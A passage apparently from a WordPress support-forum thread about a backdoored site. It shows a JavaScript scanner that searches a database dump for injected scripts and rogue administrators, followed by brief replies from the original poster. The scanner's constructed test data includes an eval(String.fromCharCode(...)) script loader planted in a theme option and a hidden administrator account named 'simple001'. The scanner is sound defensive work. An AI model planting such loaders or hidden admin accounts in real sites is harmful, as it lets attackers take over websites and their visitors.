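  for (const line of dump.split('\n')) {
    const m = line.match(INSERT_RE);
    if (!m) continue;
    for (const tuple of m[2].match(TUPLE_RE) || []) yield { table: m[1], tuple };
  }
}

// Report every row/indicator pair. `row` is the first string column of the tuple,
// which is option_name in wp_options and user_login in wp_users.
function scanDump(dump) {
  const findings = [];
  for (const { table, tuple } of rows(dump)) {
    for (const { name, re } of SUSPICIOUS) {
      const hit = re.exec(tuple);
      if (!hit) continue;
      const fm = tuple.match(FIRST_STRING_RE);
      findings.push({
        table, row: fm ? fm[1] : '', indicator: name,
        excerpt: tuple.slice(Math.max(0, hit.index - 30), hit.index + 70),
      });
    }
  }
  return findings;
}

// Cross-reference usermeta capabilities with the users table so a rogue
// administrator (like the payload's "simple001") shows up by login name.
function findAdminUsers(dump) {
  const logins = new Map();   // user ID -> user_login
  const adminIds = new Set(); // IDs whose capabilities include administrator
  for (const { table, tuple } of rows(dump)) {
    if (/users$/.test(table)) {
      const m = tuple.match(/^\((\d+),'((?:[^'\\]|\\.)*)'/);
      if (m) logins.set(m[1], m[2]);
    } else if (/usermeta$/.test(table)) {
      const m = tuple.match(/^\((\d+),(\d+),'\w*capabilities','((?:[^'\\]|\\.)*)'/);
      if (m && /administrator/.test(m[3])) adminIds.add(m[2]);
    }
  }
  return [...adminIds].map(id => ({ id, login: logins.get(id) || '(no users row)' }));
}

// Constructed dump excerpt: a clean option, a theme_mods row carrying a loader of the
// kind shown in the thread, and a second administrator matching the payload's account.
const DUMP = `
INSERT INTO \`wp_options\` VALUES (1,'siteurl','https://example.test','yes'),(2,'blogname','Example','yes');
INSERT INTO \`wp_options\` VALUES (99,'theme_mods_eduma-child','a:1:{s:10:\\"custom_css\\";s:70:\\"<script language=javascript>eval(String.fromCharCode(118, 97, 114))</script>\\";}','yes');
INSERT INTO \`wp_users\` VALUES (1,'admin','$P$Bx','admin','admin@example.test','','2016-01-01 00:00:00','',0,'admin'),(7,'simple001','$P$By','simple001','simple@simplesite.com','http://simple.com/','2018-03-01 00:00:00','',0,'simple');
INSERT INTO \`wp_usermeta\` VALUES (10,1,'wp_capabilities','a:1:{s:13:\\"administrator\\";b:1;}'),(11,7,'wp_capabilities','a:1:{s:13:\\"administrator\\";b:1;}'),(12,7,'nickname','simple001');
`;

const FINDINGS = scanDump(DUMP);
const ADMINS = findAdminUsers(DUMP);
console.log(FINDINGS);
console.log(ADMINS);
```

Every finding still needs eyes on it (a legitimate plugin may store a script tag in an option), but a theme_mods or widget option containing String.fromCharCode or eval, or an administrator you did not create, is what to look for in the dump.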

    Thread Starter Blutarsky

    (@blutarsky)

    I couldn’t get rid of the backdoor

    Same problem here. There should be a preview to verify.

    Thread Starter Blutarsky

    (@blutarsky)

    Fantastic, thanks!

    Thread Starter Blutarsky

    (@blutarsky)

    I remember some cron jobs with a given URL…
